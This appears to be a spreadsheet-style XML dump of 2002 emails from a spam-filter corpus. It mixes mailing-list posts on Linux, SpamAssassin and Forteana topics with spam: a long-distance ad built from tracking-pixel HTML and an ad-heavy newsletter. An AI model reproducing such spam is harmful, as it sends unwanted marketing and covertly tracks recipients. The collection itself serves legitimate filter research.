    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == Joseph S Barrera, &lt;Joseph&gt; writes:
     J&gt; Fine, *I'll* fork it. This piece has been up on the wall of our
     J&gt; CTO's office for years. It deserves to be forked, or even
     J&gt; reforked.
 Any idea of the date of this "Hemingway Contest" claim?  Apparently
 RAID places it c.1995 but I'm just curious as to how many years this
 may have been out there.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] Integrating SA with Mail::CheckUser ?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 22 Aug 2002 the voices made Justin Mason write:
 &gt; &gt; The perl-module Mail::CheckUser implements a smtp-callback and I hope
 &gt; &gt; it might be integrated rather easily.
 &gt; &gt; Has this extension been discussed before (and perhaps rejected)?
 &gt; &gt; Or perhaps someone is already planning to implement it?
 &gt; &gt; Or would you be interested to integrate a smtp-callback-patch in
 &gt; &gt; SpamAssassin if contributed by my department? We would not be to happy
 &gt; &gt; about such a patch which we had to manage and integrate with SA in the
 &gt; &gt; future, but I believe a one-time contribution would be no problem.
  How'd this deal with you running SA on an account where all the mail from some
 domain on another server ends up?
 	/Tony
 -- 
 # Per scientiam ad libertatem! // Through knowledge towards freedom! #
 # Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #
      perl -e'print$_{$_} for sort%_=`lynx -dump svanstrom.com/t`'
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Vintage Music Archive
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85515879
 Date: Not supplied
 Dismuke has a 24 hour radio station and RealAudio archive of '20s and '30s 
 music. Some nice stuff in here. (Also check out my favorite music archive, Red 
 Hot Jazz[1].) Link[2] Discuss[3]
 [1] http://boingboing.net/redhotjazz.com
 [2] http://dismuke.org/
 [3] http://www.quicktopic.com/16/H/xywUUftYHEg
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Re: Argh!
</t>
  </si>
  <si>
    <t xml:space="preserve">--- In forteana@y..., That Goddess Chick &lt;felinda@f...&gt; wrote:
 &gt; &gt;It's official, I'm a failure. 
 The only moderately famous schoolmates I have are both (now) freelance
 tech journos. One, Gordon Laing, used to be editor of Personal
 Computer World (personal page http://www.glnow.com) and the other
 (Laurence Grayson) seems to pop up frequently in ZDNet publications 
 (http://news.zdnet.co.uk/story/0,,t269-s2070948,00.html reveals the
 accurate statement "nobody does mournfully better than Laurence"). I
 have the satisfaction of knowing that the former is now raving bald
 and that I once stole the latter's girlfriend.
 Oh, yes, nearly forgot Ramon Tikaram (Tanita's brother) who's gone
 from "Cutthroat Island" to the series "This Life" and has now reached
 the dizzying heights of "Crossroads". He isn't a half bad musician,
 actually. He was a year or two above me at uni, so I'm not sure that
 he counts.
 My uncle was at Oxfnord with Alan Bennett and a few others whose names
 I forget.
 My wife tells me that someone she was at school with became one of the
 Teletubbies (well, they were from St Just, what can you expect) and
 another (who Rev Joe might know) is now a movie special-effects wizard
 called Bellamy (possibly "Pete", definitely not "David").
 Rob
 and then there was the time i nearly knocked Harold Wilson under a
 train....
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 10:04:55AM +0100, Padraig Brady mentioned:
 &gt; http://list.cobalt.com/pipermail/cobalt-developers/2001-February/026056.html
  That isn't the problem - I've flashed the raq3 with the 2.3.40 PROM, a
 beta one, required to get the 2.4 kernel's booting.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Reducing impact from tons of email
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm not sure if this is really a razor problem/issue or a sendmail
 problem. Here's the scenario... My mail server is a 150mhz PC funning
 FreeBSD 4.4. Ordinarily, the machine is quite idle; it supports my
 wife's web site with Apache server running on it and a few other
 services (jabber, etc). Between the various members of our family, we
 get a fair amount of email coming in (mailing lists, etc). On
 occasion, our DSL-based ISP dies for a number of hours. When we get a
 reconnection to the Internet, I get a huge flow of emails coming in
 which are then filtered via razor. As a result, I will sometimes see
 over 20+ sendmail processes running at the same time after such an
 occasion. The machine is then REALLY slow.
 I noticed that my /etc/procmailrc file had had no arguments associated
 with the call to razor-check. There was something in the log, though,
 to make me suspicious that it was possibly not seeing all my razor
 files. So I have just added "-home /etc/razor" as an argument. I
 haven't had any down time since then so I cannot comment on whether
 this change has sped up my razor processing a noticable amount. (This
 paragraph may be an aside to my real problem, the first paragraph
 above; but I thought I should be complete in my description.)
 At any rate, has anyone else suffered from a backlog of email
 processing creating lots and lots of sendmail processes?  Is there,
 perhaps, a way to limit the number of sendmail processes?
 Any ideas would be welcome.
 Thanks,
 Joe
 ---
 Joe Berry
 joe@topshot.com
 AIM "joe topshot"
 Yahoo Msgr "joetopshot"
 jabber "joetopshot@topshot.com"
 Baltimore, MD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</si>
  <si>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Red Hat Linux 8.0 now available on Red Hat Network
</t>
  </si>
  <si>
    <t xml:space="preserve">Red Hat Linux 8.0 is now available.  Get priority access to the Red Hat
 Linux 8.0 upgrade by subscribing to Red Hat Network Basic service for just
 $60 USD annually.  Get it now:
 https://rhn.redhat.com/network/sales/purchase.pxt
 What does $60 a year get you?
   * Instant ISOs of any Red Hat Linux public release for the duration of
     your subscription.
   * Priority access to updates and ISOs -- no busy signals, no searching
     mirror sites, no waiting.
 What's new in Red Hat Linux 8.0, anyway?
   * A new interface -- a user-friendly desktop with graphical enhancements
     and improved menu organization.
   * The latest Gnu Compiler Collection, gcc-3.2, and a specially tuned
     and tested high-performace kernel, 2.4.18.
   * Cutting-edge web server technology powered by the latest release
     of Apache, 2.0.
   * Updated graphical configuration tools that make setting up a Linux
     server a truly point-and-click experience.
   * A single interface for package selection during and after installation
   * Enhanced personal security, featuring a point-and-click firewall
     tool to protect your system from Internet intruders.
 How do I upgrade once I subscribe to Red Hat Network Basic service?
   * After purchase, you will be directed to the Instant ISO page.
     From there, follow the instructions for downloading and installing
     Red Hat Linux 8.0 from the ISO images.
 Read more at: http://www.spamassassin.taint.org/software/linux/
 DOWNLOAD 8.0 NOW.
 Subscribe to Red Hat Network Basic and start downloading Red Hat Linux 8.0
 instantly.
 https://rhn.redhat.com/network/sales/purchase.pxt
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] It's August, and big cats are on the prowl
</t>
  </si>
  <si>
    <t xml:space="preserve">The Times
  August 28, 2002
  It's August, and big cats are on the prowl
  By Alan Hamilton
  ROUND up the sheep. Pull on the gauntlets. Oil the shotgun. The British
  countryside is crawling with pumas, black panthers, fen tigers and other big,
  vicious cats. No corner of the nation is safe. Evidence released yesterday,
  including sightings, photographs, paw prints, livestock kills and hair
  samples, claims to prove that every county has big cats lurking in its
  undergrowth, poised to pounce on man and beast alike. 
  Sightings have reached record levels in 2002, according to Daniel Bamping,
  founder of the British Big Cats Society, which in the past 12 months has
  received more than 800 reports of big cat sightings. 
  During the first six months we have seen an incredible amount of big cat
  activity. We have now had reports in every single county; the response from
  the public has been fantastic, Mr Bamping said. Big cats in Britain are
  real. They are out there, they are breeding; theres more of them. 
  Scotland and Gloucestershire are said to be hotspots of big cat activity. Mark
  Fraser, who heads the societys Scottish arm, said: Lynx are now present in
  the Scottish countryside; I believe they are established and breeding. I dont
  want to hazard a guess at the numbers; suffice it to say there are several
  hotspots, notably Fife, Aberdeenshire, Inverness and the Borders. 
  Next month the society plans to unveil its full dossier of evidence, which
  includes two dead wild cats, pictures of paw prints and tree scratchings, as
  well as stories of a horse strangely lacerated in West Wales and a man in
  Gravesham, Kent, who had to beat a hasty retreat to his garage after his hand
  was cut by a creature the size of a labrador dog, except that it had black
  hairy tufts on the tips of its ears. 
  The society is taking the sightings seriously. It plans to set up a network of
  trigger-cameras throughout the country to capture further evidence of the
  beasts, which it will then present to the Government. 
  It is not, however, clear on what it wants the Government to do about it all.
  Throwing its weight behind the pro-hunting lobby might be a start. 
  Next in August: record abductions by aliens.
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">John P. Looney wrote:
 &gt; On Thu, Aug 08, 2002 at 11:51:18AM -0600, Scott Wunsch mentioned:
 &gt; 
 &gt;&gt;On Thu, 08-Aug-2002 at 11:31:01 +0100, John P. Looney wrote:
 &gt;&gt;
 &gt;&gt;&gt; I've installed Redhat 7.3 on a raq3's disk. But fscked if I can get the
 &gt;&gt;&gt;kernel in /boot/vmlinuz-2.4.18-3 to boot. It's insisting pulling the
 &gt;&gt;&gt;kernel from ... somewhere else. The old cobalt kernel.
 &gt;&gt;
 &gt;&gt;http://www.gurulabs.com/rgh-cobalt-howto/index.html
 &gt;&gt;
 &gt;&gt;The Cobalt systems have some neat firmware boot code that will read the
 &gt;&gt;ext2 filesystem and find the kernel itself... if you put it exactly where
 &gt;&gt;they expect it.
 &gt; 
 &gt;  Alas, I've been following that howto, and it doesn't seem to work. It
 &gt; could be because i'm using ext3 for the rootfs though.
 ext2 can mount an ext3 partition, but there are
 probably small changes required (to the BIOS)
 to support this?
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Best Long Distance On the Net - 3.9 Cents With No Monthly Fees
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;mailv07a.gif&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html;"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff"&gt;
 &lt;table align="center" border="0" cellpadding="0" cellspacing="0" width="625"&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=QEFYURPIKEMY"&gt;&lt;img src="http://admanmail.com/ads/bottomline/imgs/mailv07a_01.gif" width="266" height="103" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
    &lt;td&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=QEFYURPIKEMY"&gt;&lt;img src="http://admanmail.com/ads/bottomline/imgs/mailv07a_02.gif" width="359" height="103" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=QEFYURPIKEMY"&gt;&lt;img src="http://admanmail.com/ads/bottomline/imgs/mailv07a_03.jpg" width="266" height="187" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
    &lt;td&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=QEFYURPIKEMY"&gt;&lt;img src="http://admanmail.com/ads/bottomline/imgs/mailv07a_04.gif" width="359" height="187" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=QEFYURPIKEMY"&gt;&lt;img src="http://admanmail.com/ads/bottomline/imgs/mailv07a_05.gif" width="266" height="122" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
    &lt;td&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=QEFYURPIKEMY"&gt;&lt;img src="http://admanmail.com/ads/bottomline/imgs/mailv07a_06.gif" width="359" height="122" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=QEFYURPIKEMY"&gt;&lt;img src="http://admanmail.com/ads/bottomline/imgs/mailv07a_07.gif" width="266" height="36" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
    &lt;td&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=QEFYURPIKEMY"&gt;&lt;img src="http://admanmail.com/ads/bottomline/imgs/mailv07a_08.gif" width="359" height="36" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;img src="http://theadmanager.com/server/t.asp?ad_key=QEFYURPIKEMY" width="1" height="1" hspace="0" vspace="0" border="0" alt="T"&gt;
 &lt;img src="http://admanmail.com/server/t.asp?ad_key=QEFYURPIKEMY"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</si>
  <si>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[zzzzteana] A Billy for the septics
</t>
  </si>
  <si>
    <t xml:space="preserve">http://news.bbc.co.uk/1/hi/uk/2310209.stm
 Tuesday, 8 October, 2002, 13:53 GMT 14:53 UK
 Quiz: Know your Cockney Rhyming Slang?
 Cockney Rhyming Slang is alive and well with new terms being invented all
 the time, according to the new Oxford Dictionary of Rhyming Slang being
 published this week.
 But do you know a Raquel Welch (belch) from a Billie Piper (windscreen
 wiper)?
 ...
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Plan to Sell a Home?
 http://us.click.yahoo.com/J2SnNA/y.lEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] How'd this one slip through?
</t>
  </si>
  <si>
    <t xml:space="preserve">Rose, Bobby wrote:
 &gt; Ouch ;-)  Although I'm not ready to give up razor just yet, I'd like to
 &gt; see a pyzor check in SA.  I don't think it even needs to be written in
 &gt; perl.  SA is actually calling razor-check and razor-report as well as
 &gt; dccproc for those checks so it should be nothing more than duplication
 &gt; of coding to add pyzor. 
 The problem is that Python has a much longer startup time than Perl 
 (though this may have changed recently, I don't know). This is partly 
 why Python was never very popular for CGIs.
 Matt.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</si>
  <si>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if it were me, i think i'd have a spare set of tanks in ft. irwin, and 
 just move the soldiers.  
 On 31 Jul 2002, James Rogers wrote:
 &gt; The first is logistical: Virtually all the mechanized infantry units are
 &gt; located east of the Rockies, and it must be very expensive to move
 &gt; entire heavy combat divisions a couple thousand miles every time they
 &gt; want to run training exercises.  This is particularly true since so much
 &gt; of our military is made up of reserve components these days, meaning
 &gt; that you can't move the soldiers to where the training facilities are.
 &gt; 
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: introductions
</t>
  </si>
  <si>
    <t xml:space="preserve">As I've had to resubscribe to fork and fork-noarchive,
 I guess I have to reintroduce myself.  I'm formerly
 known as gbolcer at endtech dot com to the FoRK
 mailman program, formerly an overposter, and love
 soaking up bits through avid reading or scanning
 of almost every single list that's got informative to say. 
 Hopefully all those overpost will get cleared out at
 somepoint and fork-archived.   
 Greg
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: HAWAI`I &amp; ENENKIO KINGDOMS  AMERICANS SHAME !
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: When a Crop Becomes King
</t>
  </si>
  <si>
    <t xml:space="preserve">But I *like* corn..
 -------- Original Message --------
 Subject: [interest] FWD: When a Crop Becomes King
 Date: Fri, 19 Jul 2002 10:14:23 -0400 (EDT)
 From: Donald Eastlake 3rd &lt;dee3@torque.pothole.com&gt;
 &lt;http://www.nytimes.com/2002/07/19/opinion/19POLL.html&gt;
 July 19, 2002
 When a Crop Becomes King
 By MICHAEL POLLAN
 CORNWALL BRIDGE, Conn. -- Here in southern New England the corn is
 already waist high and growing so avidly you can almost hear the creak
 of stalk and leaf as the plants stretch toward the sun. The ears of
 sweet corn are just starting to show up on local farm stands,
 inaugurating one of the ceremonies of an American summer. These days the
 nation's nearly 80 million-acre field of corn rolls across the
 countryside like a second great lawn, but this wholesome, all-American
 image obscures a decidedly more dubious reality.
 Like the tulip, the apple and the potato, zea mays (the botanical name
 for both sweet and feed corn) has evolved with humans over the past
 10,000 years or so in the great dance of species we call domestication.
 The plant gratifies human needs, in exchange for which humans expand the
 plant's habitat, moving its genes all over the world and remaking the
 land (clearing trees, plowing the ground, protecting it from its
 enemies) so it might thrive.
 Corn, by making itself tasty and nutritious, got itself noticed by
 Christopher Columbus, who helped expand its range from the New World to
 Europe and beyond. Today corn is the world's most widely planted cereal
 crop. But nowhere have humans done quite as much to advance the
 interests of this plant as in North America, where zea mays has
 insinuated itself into our landscape, our food system and our federal
 budget.
 One need look no further than the $190 billion farm bill President Bush
 signed last month to wonder whose interests are really being served
 here. Under the 10-year program, taxpayers will pay farmers $4 billion a
 year to grow ever more corn, this despite the fact that we struggle to
 get rid of the surplus the plant already produces. The average bushel of
 corn (56 pounds) sells for about $2 today; it costs farmers more than $3
 to grow it. But rather than design a program that would encourage
 farmers to plant less corn which would have the benefit of lifting the
 price farmers receive for it Congress has decided instead to subsidize
 corn by the bushel, thereby insuring that zea mays dominion over its
 125,000-square mile American habitat will go unchallenged.
 At first blush this subsidy might look like a handout for farmers, but
 really it's a form of welfare for the plant itself -- and for all those
 economic interests that profit from its overproduction: the processors,
 factory farms, and the soft drink and snack makers that rely on cheap
 corn. For zea mays has triumphed by making itself indispensable not to
 farmers (whom it is swiftly and surely bankrupting) but to the Archer
 Daniels Midlands, Tysons and Coca-Colas of the world.
 Our entire food supply has undergone a process of "cornification" in
 recent years, without our even noticing it. That's because, unlike in
 Mexico, where a corn-based diet has been the norm for centuries, in the
 United States most of the corn we consume is invisible, having been
 heavily processed or passed through food animals before it reaches us.
 Most of the animals we eat (chickens, pigs and cows) today subsist on a
 diet of corn, regardless of whether it is good for them. In the case of
 beef cattle, which evolved to eat grass, a corn diet wreaks havoc on
 their digestive system, making it necessary to feed them antibiotics to
 stave off illness and infection. Even farm-raised salmon are being bred
 to tolerate corn  not a food their evolution has prepared them for. Why
 feed fish corn? Because it's the cheapest thing you can feed any animal,
 thanks to federal subsidies. But even with more than half of the 10
 billion bushels of corn produced annually being fed to animals, there is
 plenty left over. So companies like A.D.M., Cargill and ConAgra have
 figured ingenious new ways to dispose of it, turning it into everything
 from ethanol to Vitamin C and biodegradable plastics.
 By far the best strategy for keeping zea mays in business has been the
 development of high-fructose corn syrup, which has all but pushed sugar
 aside. Since the 1980's, most soft drink manufacturers have switched
 from sugar to corn sweeteners, as have most snack makers. Nearly 10
 percent of the calories Americans consume now come from corn sweeteners;
 the figure is 20 percent for many children. Add to that all the
 corn-based animal protein (corn-fed beef, chicken and pork) and the corn
 qua corn (chips, muffins, sweet corn) and you have a plant that has
 become one of nature's greatest success stories, by turning us (along
 with several other equally unwitting species) into an expanding race of
 corn eaters.
 So why begrudge corn its phenomenal success? Isn't this the way
 domestication is supposed to work?
 The problem in corn's case is that we're sacrificing the health of both
 our bodies and the environment by growing and eating so much of it.
 Though we're only beginning to understand what our cornified food system
 is doing to our health, there's cause for concern. It's probably no
 coincidence that the wholesale switch to corn sweeteners in the 1980's
 marks the beginning of the epidemic of obesity and Type 2 diabetes in
 this country. Sweetness became so cheap that soft drink makers, rather
 than lower their prices, super-sized their serving portions and
 marketing budgets. Thousands of new sweetened snack foods hit the
 market, and the amount of fructose in our diets soared.
 This would be bad enough for the American waistline, but there's also
 preliminary research suggesting that high-fructose corn syrup is
 metabolized differently than other sugars, making it potentially more
 harmful. A recent study at the University of Minnesota found that a diet
 high in fructose (as compared to glucose) elevates triglyceride levels
 in men shortly after eating, a phenomenon that has been linked to an
 increased risk of obesity and heart disease. Little is known about the
 health effects of eating animals that have themselves eaten so much
 corn, but in the case of cattle, researchers have found that corn-fed
 beef is higher in saturated fats than grass-fed beef.
 We know a lot more about what 80 million acres of corn is doing to the
 health of our environment: serious and lasting damage. Modern corn
 hybrids are the greediest of plants, demanding more nitrogen fertilizer
 than any other crop. Corn requires more pesticide than any other food
 crop. Runoff from these chemicals finds its way into the groundwater
 and, in the Midwestern corn belt, into the Mississippi River, which
 carries it to the Gulf of Mexico, where it has already killed off marine
 life in a 12,000 square mile area.
 To produce the chemicals we apply to our cornfields takes vast amounts
 of oil and natural gas. (Nitrogen fertilizer is made from natural gas,
 pesticides from oil.) America's corn crop might look like a sustainable,
 solar-powered system for producing food, but it is actually a huge,
 inefficient, polluting machine that guzzles fossil fuel -- a half a
 gallon of it for every bushel.
 So it seems corn has indeed become king. We have given it more of our
 land than any other plant, an area more than twice the size of New York
 State. To keep it well fed and safe from predators we douse it with
 chemicals that poison our water and deepen our dependence on foreign
 oil. And then in order to dispose of all the corn this cracked system
 has produced, we eat it as fast as we can in as many ways as we can
 turning the fat of the land into, well, fat. One has to wonder whether
 corn hasn't at last succeeded in domesticating us.
 ======
 Michael Pollan is the author, most recently, of "The Botany of Desire: A
 Plant's-Eye View of the World."
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Windows Daily]  Dignity Shakedown
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/daily/20020716.html"&gt;
       http://www.lockergnome.com/issues/daily/20020716.html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&lt;/style&gt;&lt;title&gt;20020716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href="http://www.qksrv.net/click-471546-5032686"&gt;&lt;img src="http://www.qksrv.net/image-471546-5032686" width="468" height="60" alt="DDR Memory at Crucial.com" border="0"&gt;&lt;/a&gt;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07.16.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Hackers and crackers respect only one thing:&lt;/b&gt; &lt;font color="blue"&gt;strong security&lt;/font&gt;. Keep the bad guys out of your PC or network with the advanced technology that's trusted by millions: ZoneAlarm Pro 3.0. This best-in-class personal firewall stops hackers cold, defends your online privacy,and sets up in minutes. &lt;a href="http://psstt.com/1/c/22869/63809/191269/191269"&gt;Click here to download now&lt;/a&gt;!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 Well, it's been half a week since we released it, and we're still
 getting record downloads for our first
 &lt;a href="http://www.gnometomes.com/"&gt;FREE Gnometome&lt;/a&gt;. What does
 that mean? Simple. Download all you want - we'll definitely make
 more. In fact, we've found a way to get your products and services
 a little bit of unlimited promotion on the side, too. And who
 couldn't use a little more traffic nowadays? Well, unless your
 data transfer bill is already sky high (which can happen when you
 get featured). It's all fun and games until someone's server falls
 to its knees. We're still &lt;A HREF="http://www.amazon.com/exec/obidos/redirect?tag%3Dlockergnomedigit%26path%3Dsearch-handle-url%2Ffield-keywords%3Dlockergnome"&gt;sitting
 at #5 on Amazon&lt;/A&gt;. If we ever
 hit #1, I'll eat my hat. And, mind you, this hat has been sitting
 around for quite a while; it smells like feet. You'd have to eat
 three sombreros just to get the same amount of nutrition you'd get
 from my hat. You're better off just going for the free stuff, I
 suppose. The next time they ask: "Do you care to Super Size that?"
 You can respond, with dignity: "My funds are sufficient for the
 upgrade; I avoided spending money on something that would have
 lasted longer, supported a helpful cause, and not have killed me
 earlier." It makes sense - if you think about it. The fries aren't
 going to eat themselves. And if YOU don't eat the fries, who will?
 &lt;p&gt;
 Put your hunger aside for just a moment. It's time for a paragraph
 I like to call: "Why you shouldn't sign up for DirectDSL." They
 went out of their way to send me an unsolicited e-mail this
 evening. Now, I know what you're thinking: "How kind of them,
 Chris. You were just asking about DSL providers in yesterday's
 issue. They must have read your mind!" No, they must have rented a
 list of addresses which weren't confirmed. But the fun didn't stop
 there. I received a message about DirectTV from yet ANOTHER
 marketing company. Their effort was indeed caught by this crafty
 eye, and my money will be diverted to other (less-spammish)
 businesses in the future. It's my "direct" way of saying: you're
 not the only game in town. Anybody else care to test my patience?
 I didn't think so. My blacklist gets shared with 250,000 people
 from around the world. Oops! My Inbox just got slammed with more
 junk; looks like Lycos will never get another click from me,
 either. See what you get when you tempt fate?
 &lt;p&gt;
 My good buddy, &lt;a href="http://www.dnscentral.com/"&gt;Bill&lt;/a&gt;,
 tells me that &lt;a href="http://www.speakeasy.net/refer/62026"&gt;Speakeasy.net&lt;/a&gt;
 provides great DSL connections. He'll even get the credit if I
 sign up through his affiliate link! Paul Howes agrees with him,
 too: "Static IPs are the norm, they do not use PPPoE, and they
 encourage people to run servers on their DSL connection. When
 looking at their packages, I suggest you look at the 'Home
 Services' page. They even have ADSL up to 1.5M downstream / 768k
 upstream, which I have not seen from any other provider. And that
 is less than $200 a month, which is a bargain when you start
 looking at the prices of a 768k SDSL line!" And Stuart Portner is
 chock full of common sense: "Remember that a lot of DSL providers
 give you the modem for free and prefer that you use theirs - at
 least for initial setup / shakedown period." All the more fries
 for me, dude!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class="title"&gt;&amp;nbsp;GnomeCONFERENCE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;center&gt;&lt;a href="http://www.gnomedex.com/"&gt;&lt;img alt="Heigh-Ya!" src="http://chris.pirillo.com/archives/gnomedexshirt.gif" width="320" height="258" border="0" /&gt;&lt;br&gt;$99 Pre-Registration / $150 At The Door&lt;/a&gt;&lt;/center&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeDOWNLOADS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;table align="right" bgcolor="#FFFFFF" cellspacing="0" cellpadding="10"&gt;&lt;tr&gt;&lt;td&gt;&lt;table align="left" bgcolor="#990000" cellspacing="0" cellpadding="2"&gt;&lt;tr&gt;&lt;td&gt;&lt;table border="0" cellpadding="4" cellspacing="0"&gt;
 &lt;tr&gt;&lt;td align="center" valign="middle" bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;&lt;B&gt;Today's Downloads&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=100298"&gt;AppPlus 3.24&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=101109"&gt;EaseBackup 3.70&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=101536"&gt;HotCrypt 4.12&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=101751"&gt;Arles Image Web Pa 4.94&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=103079"&gt;Smasher 2.9.12&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=103431"&gt;The Bat! 1.61&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=103869"&gt;WinSafe 1.1.2&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=104359"&gt;Privacy Eraser 1.68&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=103961"&gt;Zero Popup 3.0&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.mywebattack.com/gnomeapp.php?id=103863"&gt;WinPulse 1.01&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;b&gt;Company Overview v1.3 [389k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
 &lt;a class="URL" href="http://www.toteboard.net/Models/company_overview.htm"&gt;http://www.toteboard.net/Models/company_overview.htm&lt;/a&gt;
 &lt;p&gt;
 {Check your stocks} When you're doing long-term investing, the
 best thing to do with your money is to invest and then "forget
 about it." Our Gnomie buddy Brian Stevens is the type of guy that
 likes to play the stock market. He's always logging into E*TRADE
 and checking on his stocks. That's a lot of work! We told him to
 forget about it and let Company Overview do the work. This Excel
 spreadsheet and add-in is a great way to check stocks and save the
 data into a separate Excel spreadsheet. Brian says, "E*TRADE
 doesn't give me half the information that Company Overview does,
 such as insider trades and financial trends, along with many other
 tidbits of information." NOTE: You must use Excel 2000 or higher
 for the spreadsheet to operate correctly.
 &lt;p&gt;&lt;br&gt;
 &lt;b&gt;Flexible Renamer v5.2.0 [426k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;p&gt;
